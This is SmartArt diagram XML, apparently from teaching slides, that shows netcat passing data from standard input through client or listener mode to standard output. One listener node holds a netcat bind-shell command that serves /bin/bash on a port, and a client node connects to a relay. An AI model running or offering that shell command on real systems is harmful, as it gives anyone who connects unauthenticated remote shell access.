    <dgm:cxn modelId="{0D399FBC-FDFC-D244-9111-EC4E6DD287A4}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E1B3ECAE-D0B3-FB40-9793-8D66C5F88B1F}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{4F37B031-7D77-CF42-8B31-F828A9D2DC40}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{779F7ACF-456C-E24D-8B24-58E77B63BB47}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{50681C18-898D-6E42-8448-48D04116C2AB}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{627D35F7-1F08-AF46-BFEB-9D50A9F8362F}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F6D7D455-8CC5-2B40-8399-8177DB0B84A9}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{BDA1DE2E-96A9-C94D-B643-C141244B39AE}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{36B9DB22-D4DC-034B-8518-3D220766B6F2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{DAC588CB-ABAF-464A-A75D-BD3B689C41D0}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{435B8260-F1B9-F246-BE87-CE94774F85B8}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9BED6BD9-C0DC-C744-9306-B07F523E450C}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{3F7678C8-A210-464D-AB10-5199794E78F3}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{D54604C7-D0AF-E34B-91E8-3AF588340DA5}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E7D536DE-53ED-9841-873A-000171AB6D5F}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{0EE166AB-3189-C940-84CA-14491D11C467}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{4EAF422F-9ED9-FA45-BC3D-439A93B4FD8C}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B332A428-8676-EC40-9DEC-0731237F846F}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6944E763-2A31-5545-A556-9EC45DCABFF6}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{D08F369A-10D9-6A45-8283-FEEC7C4DD3F6}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8D470A23-2FC5-F140-9DE3-289531809DC6}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C366862F-A6CB-7941-B934-88A44F0EC142}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5591B447-C820-F941-9252-63673F340A93}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6A939820-AC94-C540-A52D-A222DBA14738}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}"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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F3C498AF-D1DC-1C4F-AD9A-981EEEC89D36}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C0C124EC-779E-4043-A108-3E5A1DC70CE9}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E94C7323-46F9-D54B-9DD4-F9429B10CF0C}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9FDAC527-ECB4-4745-B577-89D930DA511C}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
